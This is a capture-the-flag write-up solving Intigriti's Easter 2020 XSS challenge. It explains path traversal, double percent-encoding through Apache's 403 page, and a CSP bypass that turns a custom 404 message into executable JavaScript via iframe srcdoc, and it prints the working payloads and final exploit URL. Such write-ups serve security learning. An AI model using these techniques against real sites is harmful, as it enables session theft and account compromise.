Intigriti Easter XSS Challenge Solution Write-Up: The Forbidden 404 Error
TL;DR Final Payload:
https://challenge.intigriti.io/#.htaccess/%253Ciframe%2520srcdoc%253D%2522%253Cscript%2520src%253D%2526quot%253B'%252Balert(document.domain)%252B'%2526quot%253B%253E%253C%252Fscript%253E%2522%253E%253C%252Fiframe%253E
Question
CHALLENGE: Find the XSS in our #EasterChallenge and WIN a @Burp_Suite Pro License! We’ll tweet a tip for every 100 likes! #HackWithIntigriti https://t.co/dYnctSfAAq
— INTIGRITI (@intigriti) April 13, 2020
Source of script.js:
var hash = document.location.hash.substr(1);
if(hash){
  displayReason(hash);
}
document.getElementById("reasons").onchange = function(e){
  if(e.target.value != "")
    displayReason(e.target.value);
}
function reasonLoaded () {
  var reason = document.getElementById("reason");
  reason.innerHTML = unescape(this.responseText);
}
function displayReason(reason){
  window.location.hash = reason;
  var xhr = new XMLHttpRequest();
  xhr.addEventListener("load", reasonLoaded);
  xhr.open("GET",`./reasons/${reason}.txt`);
  xhr.send();
}
Part 1: Getting arbitrary HTML to reflect
On the surface, the index page has nothing out of the ordinary in its source code, and all JavaScript is loaded from script.js, so let’s take a look at that. From these simple 20 lines of code, we can trace the main flow of our XSS vector as follows:
1) Line 1: document.location.hash.substr(1), the part of the URL after the # symbol, is stored in the variable hash (e.g., in https://www.example.com/abc?def=ghi#jkl, hash would contain "jkl").
2) Lines 2-4: If hash is not an empty string, run the function displayReason().
3) Lines 13-19: displayReason() fetches data from the URL https://challenge.intigriti.io/reasons/${reason}.txt, where reason is the hash string. The fetched data is passed to reasonLoaded().
4) Lines 9-12: reasonLoaded() decodes the data with unescape() and writes it to the page inside the "reason" div.
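As a rough sketch of steps 1 to 3 outside the browser, the same hash-to-request mapping can be reproduced in Node.js with the built-in URL class. The helper name requestUrlFor is made up for illustration and is not part of the challenge code.

```javascript
// Hypothetical helper (not from script.js): maps a page URL to the URL the XHR would request.
function requestUrlFor(pageUrl) {
  const page = new URL(pageUrl);
  const hash = page.hash.substr(1); // same idea as document.location.hash.substr(1)
  if (!hash) {
    return null; // script.js does nothing when the hash is empty
  }
  // xhr.open("GET", `./reasons/${reason}.txt`) is resolved relative to the page URL.
  return new URL(`./reasons/${hash}.txt`, page).href;
}

console.log(requestUrlFor("https://challenge.intigriti.io/#jkl"));
// https://challenge.intigriti.io/reasons/jkl.txt
```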
In /script.js, line 11, reason.innerHTML = unescape(this.responseText);, shows that arbitrary HTML can end up in the DOM of the page: the raw XHR response is written to the page with no sanitization and, as a matter of fact, is unescaped first. From that, we can conclude that HTML can be reflected in one of two ways:
1) The XHR response contains raw HTML text like <script>alert(1)</script>.
2) The XHR response contains percent-encoded HTML text, such as %3Cscript%3Ealert(1)%3C%2Fscript%3E, which is then passed to the unescape() function, returning exactly the same data as in 1.
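To make the two conditions concrete, here is a minimal check that runs in Node.js, where the legacy unescape() global is also available. The variable names are only for illustration.

```javascript
// Condition 1: the response already contains raw HTML; unescape() leaves it untouched.
const rawHtml = "<script>alert(1)</script>";

// Condition 2: the response contains percent-encoded HTML; unescape() decodes it.
const encodedHtml = "%3Cscript%3Ealert(1)%3C%2Fscript%3E";

console.log(unescape(rawHtml) === rawHtml);     // true
console.log(unescape(encodedHtml) === rawHtml); // true
```

Either way, the string assigned to innerHTML ends up being the same markup.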
In line 17, xhr.open("GET",`./reasons/${reason}.txt`);, directory traversal is possible since nothing filters out ../. Unfortunately, we can’t fetch XHR data from another host because the ./ prefix keeps the request on the same host, so we can’t pull the // trick that worked in Intigriti’s October 2019 DOM XSS challenge. We have to find a spot on the challenge.intigriti.io web server where one of the two conditions above holds.
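Both claims can be checked with the URL class in Node.js, which follows the same resolution rules as browsers. This is only a sketch: resolveReason is a made-up helper, and robots and attacker.example are placeholder values, not files or hosts from the challenge.

```javascript
const base = "https://challenge.intigriti.io/";

// Hypothetical helper: resolves the XHR target the way a relative URL is resolved.
function resolveReason(reason) {
  return new URL(`./reasons/${reason}.txt`, base);
}

// "../" climbs out of /reasons/, so directory traversal works.
const traversal = resolveReason("../robots");
console.log(traversal.pathname); // /robots.txt

// "//" no longer switches host, because it sits behind the "./reasons/" prefix.
const otherHost = resolveReason("//attacker.example/x");
console.log(otherHost.host);     // challenge.intigriti.io
console.log(otherHost.pathname); // /reasons///attacker.example/x.txt
```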
Maybe the 404 page?
It’s not hard to tell that the 404 page has been replaced with a custom one, and the way the 404 message is structured is peculiar. It is so specifically structured that I could tell it would help us in a later step, but not now.
Why? Let’s examine its behaviour. Can the text <script> be reflected when passed as a directory, filename, parameter, or value? Accessing https://challenge.intigriti.io/<script>/<script>?<script>[<script>]=<script> yields this response.
404 - 'File "_3Cscript_3E?_3Cscript_3E_5B_3Cscript_3E_5D=_3Cscript_3E" was not found in this folder.'
Looks like anything after the last / is reflected in the 404 error message, but special characters are percent-encoded and, worse still, % is changed to _. This endpoint’s response satisfies neither of the two conditions above. I also tried tossing in all kinds of random symbols and Unicode to see how it could be broken, which didn’t break it, but it gave me a hint about where I should try next.
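The real server code is unknown, but as a guess, the observed output can be reproduced by percent-encoding the reflected part and then swapping every % for _. The function custom404Body below is purely an assumption that happens to match the response above; it shows why unescape() has nothing left to decode.

```javascript
// ASSUMPTION: a guess at the server's behaviour that reproduces the observed 404 body.
function custom404Body(requestTail) {
  const reflected = encodeURI(requestTail).replace(/%/g, "_");
  return `404 - 'File "${reflected}" was not found in this folder.'`;
}

const body = custom404Body("<script>?<script>[<script>]=<script>");
console.log(body);

// No "%" survives, so unescape() returns the body unchanged: condition 2 fails.
console.log(unescape(body) === body); // true
// No "<" survives either: condition 1 fails.
console.log(body.includes("<"));      // false
```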
Apache error pages
While just trying random stuff, a URL I tried, https://challenge.intigriti.io/<script>%2F<script>, caused the server to display the Apache 404 page instead of the custom one. %2F is the percent encoding of the symbol /, which is supposed to be the directory separator. I’m not sure of the exact reason, but my guess is that Apache got confused by a directory separator that is, well, technically not a directory separator because it’s percent-encoded.
The Apache 404 page doesn’t reflect the URL, but what about 403? To trigger the Apache 403 Forbidden page, we just need a path component that matches the /.ht* pattern, like .htaccess. The requested path is reflected on this page, but <script> is encoded to &lt;script&gt;.
Condition 1 is out, but what about condition 2? By double encoding <script> into %253Cscript%253E, the value reflected on the Forbidden page is %3Cscript%3E.
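A simplified model of the Forbidden page makes the difference visible. It assumes the server decodes the request path once and then HTML-escapes it before reflecting it; escapeHtml and reflectedOn403 are illustrative names, not Apache functions.

```javascript
// ASSUMPTION: the 403 page decodes the path once, then HTML-escapes what it reflects.
function escapeHtml(text) {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

function reflectedOn403(requestPath) {
  return escapeHtml(decodeURIComponent(requestPath));
}

// Single encoding (what the browser sends for a literal <script>): escaped, so useless.
console.log(reflectedOn403("/.htaccess/%3Cscript%3E"));     // /.htaccess/&lt;script&gt;

// Double encoding: one layer survives and contains nothing for the escaper to touch.
console.log(reflectedOn403("/.htaccess/%253Cscript%253E")); // /.htaccess/%3Cscript%3E
```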
Passing that into the original challenge page, it should go through unescape() and be reflected on the page as <script>. A lone script tag isn’t the best payload for testing DOM XSS, so I’ll be using <h1>big text</h1> instead.
- Original: <h1>big text</h1>
- Percent encoded: %3Ch1%3Ebig%20text%3C%2Fh1%3E
- Double percent encoded: %253Ch1%253Ebig%2520text%253C%252Fh1%253E
- Final payload: https://challenge.intigriti.io/#.htaccess/%253Ch1%253Ebig%2520text%253C%252Fh1%253E
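The encoding steps above can be reproduced with encodeURIComponent(). This is just one convenient way to generate the strings; doubleEncode is a name I made up for the sketch.

```javascript
// Hypothetical helper: percent-encode twice so one layer survives the server's decoding.
function doubleEncode(html) {
  return encodeURIComponent(encodeURIComponent(html));
}

const original = "<h1>big text</h1>";
const once = encodeURIComponent(original);
const twice = doubleEncode(original);
const testUrl = `https://challenge.intigriti.io/#.htaccess/${twice}`;

console.log(once);    // %3Ch1%3Ebig%20text%3C%2Fh1%3E
console.log(twice);   // %253Ch1%253Ebig%2520text%253C%252Fh1%253E
console.log(testUrl);

// One decode on the server plus unescape() in script.js gives back the original HTML.
console.log(unescape(decodeURIComponent(twice)) === original); // true
```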
And... voilà! We got HTML injected into the div.
Part 2: Bypassing CSP to execute arbitrary JavaScript
A quick XSS payload that you might think of off the top of your head is <script>alert(1);</script>, but unfortunately we’re dealing with DOM XSS: because .innerHTML is used here to insert the HTML contents, the script won’t get executed. This is standard browser behaviour for script elements inserted via innerHTML. You can look at this Stack Overflow question here as reference.
The next easy XSS payload would be <img src=x onerror=alert(1)>, which would’ve worked if not for CSP. Using this payload would give you this error message in the console.
Content Security Policy (CSP) is a security feature in modern browsers that web developers can use to restrict which origins resources (images, videos, scripts, stylesheets) may be loaded from. This is done by sending a Content-Security-Policy HTTP response header, which on this challenge page is set to default-src 'self'.
This CSP configuration means that resources can only be loaded from this origin, challenge.intigriti.io. You are not allowed to load images from Imgur, or load external JavaScript from your own web server. In fact, 'self' means that the only JavaScript that can be executed is what comes from a JS file served by challenge.intigriti.io, no exceptions, since onerror=alert(1) would need the 'unsafe-inline' CSP source to work.
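As a very simplified model (real CSP matching has more rules than this), 'self' for scripts boils down to "same origin, and not inline". The scriptAllowed function and the attacker.example host below are made up for illustration.

```javascript
// Simplified model of default-src 'self' for scripts only; not a full CSP implementation.
const pageOrigin = new URL("https://challenge.intigriti.io/").origin;

function scriptAllowed(script) {
  if (script.inline) {
    return false; // inline handlers such as onerror=... need 'unsafe-inline'
  }
  // 'self' only matches sources that share the page's origin.
  return new URL(script.src, pageOrigin).origin === pageOrigin;
}

console.log(scriptAllowed({ inline: true }));                         // false
console.log(scriptAllowed({ src: "/script.js" }));                    // true
console.log(scriptAllowed({ src: "https://attacker.example/x.js" })); // false
```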
This is where the interesting custom 404 message comes into play. Here’s what the message looks like again.
404 - 'File "thisisnotavalidfile.txt" was not found in this folder.'
Believe it or not, this is a line of totally valid JavaScript code that does not throw any exception when executed.
Let’s break down, part by part, why this is valid. 404 is an integer, and 'File "thisisnotavalidfile.txt" was not found in this folder.' is a string perfectly wrapped in single quotes. The whole line is an arithmetic expression: an integer minus a string. While mathematically meaningless, it is working code that runs without any error in the eyes of JavaScript and simply evaluates to NaN. NaN is short for “Not a Number”, which makes sense: how are you going to subtract this string from the number 404?
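You can confirm this by pasting the message into Node.js or a browser console as-is. The variable name result is only there so the value can be inspected.

```javascript
// The 404 message, evaluated as a JavaScript expression: number minus string.
const result = 404 - 'File "thisisnotavalidfile.txt" was not found in this folder.';

console.log(result);               // NaN
console.log(Number.isNaN(result)); // true
```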
We can take advantage of this fancily structured error message by breaking out of the string and injecting alert(document.domain). This can be done by requesting the non-existent “file” '+alert(document.domain)+' in the URL, as long as single quotes are not sanitised, which they aren’t, as can be seen here.
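Here is a sketch of why the breakout works, runnable in Node.js. It rebuilds the 404 body from the message template shown earlier and evaluates it with stand-ins for alert and document, since neither exists outside a browser. custom404Body, fakeAlert, and fakeDocument are all made-up names.

```javascript
// Template copied from the custom 404 message; the function itself is hypothetical.
function custom404Body(fileName) {
  return `404 - 'File "${fileName}" was not found in this folder.'`;
}

const body = custom404Body("'+alert(document.domain)+'");
console.log(body);
// 404 - 'File "'+alert(document.domain)+'" was not found in this folder.'

// Stand-ins for the browser's alert() and document.
const calls = [];
const fakeAlert = (value) => { calls.push(value); };
const fakeDocument = { domain: "challenge.intigriti.io" };

// Run the 404 body as script source, roughly what loading it via <script src> does.
new Function("alert", "document", body)(fakeAlert, fakeDocument);

console.log(calls); // [ 'challenge.intigriti.io' ]
```

The injected quotes split the message into two string literals with the alert() call concatenated in between, so the line stays syntactically valid.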
However, we’re not done yet! We can’t just use <script src="'+alert(document.domain)+'"></script> because of the innerHTML issue I described earlier. To get around this, we could use an <iframe>, but not just any classic <iframe src='data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9jaGFsbGVuZ2UuaW50aWdyaXRpLmlvLycrYWxlcnQoZG9jdW1lbnQuZG9tYWluKSsnIj48L3NjcmlwdD4='></iframe> (base64 of <script src="http://challenge.intigriti.io/'+alert(document.domain)+'"></script>). That one is still blocked by CSP, since a page generated from a data: URL has a null origin, which no longer satisfies the CSP scope of 'self'.
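The null origin can be seen with the URL class, and Node's Buffer can decode the base64 part to confirm what the iframe would contain. This is a Node.js-only sketch; the variable names are mine.

```javascript
const dataUrl =
  "data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9jaGFsbGVuZ2UuaW50aWdyaXRpLmlvLycrYWxlcnQoZG9jdW1lbnQuZG9tYWluKSsnIj48L3NjcmlwdD4=";

// A data: URL has an opaque origin, which serialises as the string "null".
console.log(new URL(dataUrl).origin);                           // null
console.log(new URL("https://challenge.intigriti.io/").origin); // https://challenge.intigriti.io

// Decode the base64 part to see the HTML the iframe would load.
const decodedHtml = Buffer.from(dataUrl.split(",")[1], "base64").toString("utf8");
console.log(decodedHtml);
// <script src="http://challenge.intigriti.io/'+alert(document.domain)+'"></script>
```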
The last piece of the puzzle lies in this blog post by NCC Group, which relies on a lesser-known iframe attribute, srcdoc. The difference between src and srcdoc is that the latter takes raw HTML instead of a URL. This HTML is then rendered as if it were part of the page, and thus has the scope and origin of the original page itself. Feel free to read their article to understand more about it.
Our payload now looks like <iframe srcdoc="<script src=&quot;'+alert(document.domain)+'&quot;></script>"></iframe>. Since we need to enclose the srcdoc value in double quotes, we need to escape the double quotes belonging to the <script> tag via HTML character entities, whereby &quot; represents ".
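The quoting step can be automated with a small helper. This is only a sketch: escapeAttribute and wrapInSrcdoc are hypothetical names, and the helper escapes just the characters that matter inside a double-quoted attribute.

```javascript
// Hypothetical helper: escape the characters that would break a double-quoted attribute.
function escapeAttribute(value) {
  return value.replace(/&/g, "&amp;").replace(/"/g, "&quot;");
}

// Hypothetical helper: wrap arbitrary HTML in an iframe's srcdoc attribute.
function wrapInSrcdoc(innerHtml) {
  return `<iframe srcdoc="${escapeAttribute(innerHtml)}"></iframe>`;
}

const inner = `<script src="'+alert(document.domain)+'"></script>`;
const iframePayload = wrapInSrcdoc(inner);

console.log(iframePayload);
// <iframe srcdoc="<script src=&quot;'+alert(document.domain)+'&quot;></script>"></iframe>
```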
Part 3: Wrapping it up
We’ve got the XSS settled and CSP bypassed, so now let’s join the two payloads together. From the payload in Part 2:
- Original payload: <iframe srcdoc="<script src=&quot;'+alert(document.domain)+'&quot;></script>"></iframe>
- Percent encoded: %3Ciframe%20srcdoc%3D%22%3Cscript%20src%3D%26quot%3B'%2Balert(document.domain)%2B'%26quot%3B%3E%3C%2Fscript%3E%22%3E%3C%2Fiframe%3E
- Double percent encoded: %253Ciframe%2520srcdoc%253D%2522%253Cscript%2520src%253D%2526quot%253B'%252Balert(document.domain)%252B'%2526quot%253B%253E%253C%252Fscript%253E%2522%253E%253C%252Fiframe%253E
And now joining it with Part 1’s payload:
- Final payload: https://challenge.intigriti.io/#.htaccess/%253Ciframe%2520srcdoc%253D%2522%253Cscript%2520src%253D%2526quot%253B'%252Balert(document.domain)%252B'%2526quot%253B%253E%253C%252Fscript%253E%2522%253E%253C%252Fiframe%253E
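As a sanity check, the final URL can be walked backwards through the chain in Node.js. The sketch assumes, as in Part 1, that the server decodes the request path once before reflecting it on the 403 page; the variable names are mine.

```javascript
const finalUrl =
  "https://challenge.intigriti.io/#.htaccess/%253Ciframe%2520srcdoc%253D%2522%253Cscript%2520src%253D%2526quot%253B'%252Balert(document.domain)%252B'%2526quot%253B%253E%253C%252Fscript%253E%2522%253E%253C%252Fiframe%253E";

// Step 1: script.js reads the hash and requests ./reasons/<hash>.txt
const hash = new URL(finalUrl).hash.substr(1);
const requestedPath = `/reasons/${hash}.txt`;

// Step 2 (ASSUMPTION): the server decodes the path once and reflects it on the 403 page.
const reflected = decodeURIComponent(requestedPath);

// Step 3: reasonLoaded() runs unescape() on the response before assigning innerHTML.
const injected = unescape(reflected);

console.log(reflected.includes("<")); // false, so HTML escaping has nothing to touch
console.log(injected);
// /reasons/.htaccess/<iframe srcdoc="<script src=&quot;'+alert(document.domain)+'&quot;></script>"></iframe>.txt
```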
Would you look at that beauty!
I’d rate this as moderately difficult. It’s not very tough, but you need to combine lots of tricks and think outside the box to achieve the final result. This applies to all the past Intigriti XSS challenges I’ve seen, so if you failed this time, better luck next time! You were probably really close and just missing that lightbulb moment.